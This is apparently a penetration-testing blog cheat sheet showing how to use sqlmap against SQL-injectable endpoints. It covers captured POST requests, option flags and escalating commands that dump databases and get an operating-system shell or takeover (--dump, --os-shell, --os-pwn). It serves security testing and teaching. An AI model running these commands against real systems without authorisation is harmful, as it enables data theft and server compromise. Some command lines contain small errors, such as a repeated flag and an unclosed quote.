Post Image

S1REN

Yeah, it's pretty useful.



I'm going to preface this with the fact that you will always want to find an endpoint with as many GET and POST parameters in a single query as possible. Being able to iterate through multiple parameters recursively to test for Input Sanitization is extremely powerful during an engagement.

The more the merrier.

S1REN, Will you-
Will I cover SQL Injection in a future blog post?
Who knows!
Who can say!?

[ sqlmap ]
https://tools.kali.org/vulnerability-analysis/sqlmap

[ + ] SQLMAP AND POST DATA:
--> Intercept HTTP POST request in Burp.
--> touch request.txt
--> nano request.txt
--> paste.
--> Remove each additional \r\n (Carriage Return & Newline Data - usually just an empty space after each header...)
--> sqlmap -r request.txt

[ + ] Optionally:
--> --dbms=mysql (Specify the Database Management System to save a LOT of time with SQLMAP...)
--> --threads=2 (Specify more threads if you wish - I find two to be fine.)
--> --time-sec=10 (In the event of time-based SQLi Queries - make the sleep time to 10 seconds...)
--> --level=2 (Specify the level for SQLMAP - it goes to a maximum of 5 levels.)
--> --risk=2 (Risk goes up to 3 at max.)
--> --technique=T (This will specify for any Time-Based versus a value of 'B' which would be "Boolean Based" heavy stack queries.)
--> --force-ssl (Some modern databases themselves require SSL Protocol.)
--> --dbs (Extract a Database Name)
--> -D <database name> (Found a Database Name? Tell SQLMap which one you're interested in.)

[ + ] All Together for request.txt:
sqlmap -r request.txt
sqlmap -r request.txt --threads=2
sqlmap -r request.txt --threads=2 --time-sec=10
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --force-ssl
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --dump
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --dump --os-shell
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --dump --os-pwn

[ + ] On your URL Environment Variable :
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl
--> or
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=B --force-ssl

[ + ] Need to specify the DMBS?
--dbms=<DBMS>
--dbms=mysql
--dbms=mssql
--> etc.

[ + ] Dump all data we get please to the terminal please.
--dump

[ + ] If the DBMS is configured to permit I/O Operations (Specifically Output). - Shell
--os-shell

[ + ] Specify a specific parameter to Test (i.e. I want to test parameter9 rather than parameters1-8 as I know that's where the injection point is already).
-->export URL="http://127.0.0.1:80/superDuperCMS.php?p1=DATA&p2=DATA&p3=DATA&p4=INJECTABLE-POINT
sqlmap -u $URL --threads=2 --risk=2 --level=3 --dbms=<DBMS> -p p4


Comments are closed.